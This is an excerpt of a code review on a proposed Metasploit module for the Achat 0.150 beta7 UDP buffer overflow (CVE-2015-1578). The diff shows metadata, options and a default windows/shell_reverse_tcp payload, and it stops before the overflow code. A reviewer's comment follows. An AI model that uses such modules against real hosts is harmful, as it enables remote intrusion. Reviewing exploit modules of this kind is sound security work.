modules/exploits/windows/misc/achat_bof_msfvenom.rb

```diff
@@ -0,0 +1,151 @@
+# frozen_string_literal: true
+
+##
+# This module requires Metasploit Framework
+##
+# Exploit Title: Achat 0.150 beta7 Buffer Overflow (UDP)
+# CVE: CVE-2015-1578
+# Date: Jun 20, 2025
+# Exploit Author: yaldobaoth
+# Vendor Homepage: http://achat.sourceforge.net/
+# Software Link: http://sourceforge.net/projects/achat/
+# Version: 0.150 beta7
+# Tested on: Windows XP SP3 English
+# Description:
+#   This module exploits a buffer overflow in Achat 0.150 beta7.
+#   The vulnerability is triggered via a crafted UDP packet, allowing
+#   remote code execution. Payload is delivered as raw msfvenom shellcode
+#   using windows/shell_reverse_tcp, encoded with x86/unicode_mixed.
+##
+
+require 'English'
+require 'msf/core'
+
+##
+# Exploit for CVE-2015-1578 affecting Achat 0.150 beta.
+# This module exploits a buffer overflow in the UDP message handler.
+# Generates a custom msfvenom payload automatically due to internal encoding issues.
+##
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Udp
+
+  def initialize(info = {})
+    super(update_info(info,
+                      'Name' => 'Achat UDP Buffer Overflow Exploit (Raw msfvenom Payload)',
+                      'Description' => '
+        Exploits a buffer overflow in Achat via a crafted UDP packet.
+        Uses raw shellcode generated via msfvenom with windows/shell_reverse_tcp.
+      ',
+                      'Author' => ['YourName'],
+                      'License' => MSF_LICENSE,
+                      'Platform' => ['win'],
+                      'Targets' => [['Universal', {}]],
+                      'DefaultTarget' => 0,
+                      'DisclosureDate' => 'Feb 08 2015',
+                      'DefaultOptions' => {
+                        'PAYLOAD' => 'windows/shell_reverse_tcp'
+                      }))
+
+    register_options(
+      [
+        Opt::RHOSTS,
+        Opt::RPORT(9256),
+        OptString.new('LHOST', [true, 'Local host for reverse shell']),
+        OptInt.new('LPORT', [true, 'Local port for reverse shell', 4444])
+      ]
+    )
+  end
+
+  def validate_payload
+    # Get the actual payload module name string
+    pl_name = datastore['PAYLOAD']
+
+    return unless pl_name != 'windows/shell_reverse_tcp'
+
+    print_warning(
+      'This exploit module currently only supports' \
+      "'windows/shell_reverse_tcp' payload, but you selected '#{pl_name}'."
+    )
+  end
+
+  ##
+  # This module invokes msfvenom externally to generate shellcode on the fly.
+  # Reason: Metasploit's internal payload generation and encoding frequently fails due to
+  # size constraints and bad character restrictions.
+  #
+  # This ensures a properly encoded, size-constrained payload that reliably executes.
+  #
+  # Note: Requires msfvenom to be in PATH. If missing or fails, the module will print an error.
+  ##
+  def generate_payload_raw
```

Comment:
This should all be handled for you by simply using `payload.encoded` if the Target information is correct. We don't need to be executing `msfvenom`, it's slower than using the already loaded version of framework and introduces opportunities for OS command injection.

I suggest you look through other exploit modules and see how they're defining their `Targets` key in their module data to achieve this.